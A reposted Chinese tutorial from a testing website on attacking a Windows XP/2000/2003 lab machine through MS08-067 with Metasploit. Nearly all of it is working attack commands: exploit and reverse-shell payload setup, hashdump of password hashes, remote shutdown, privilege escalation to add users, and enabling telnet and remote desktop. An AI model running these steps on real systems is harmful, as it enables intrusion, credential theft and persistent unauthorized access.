利用Metasploit攻击有ms8067漏洞的PC机过程

发表于:2016-1-06 10:45

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:wxluzhiping    来源:51Testing软件测试网采编

  拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器
  msfconsole进入msf控制台
  输入search ms0-067
  找到相应模块
  use exploit/windows/smb/ms08_067_netapi  使用相应模块
  set PAYLOAD windows/meterpreter/reverse_tcp 设置反弹连接
  show options 查看设置选项
  set RHOST 192.168.80.XX 设置远程主机
  set LHOST 192.168.80.YY  设置本地主机
  show targets 查看攻击目标系统类型
  set target 1 目标机器为2000
  exploit
  利用ms10-010漏洞时进行exploit时
  help sessions
  sessions -l
  sessions -i 1
  等待攻击成功,出现meterpreter>
  输入help查看可以使用命令
  ipconfig  查看对方IP地址
  hashdump获取对方hash值
  shell使用shell命令,CTRL+Z进入后台,退出exit
  shutdown远程关机
  还可以上传下载文件等等,
  上传cmd文件,和churrasco文件,然后使用churrasco命令可以执行增加用户等命令
  sc config tlntsvr start= auto
  sc start tlntsvr
  wmic /node:"[full machine name]" /USER:"[domain]\[username]"  PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1打开远程主机桌面
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号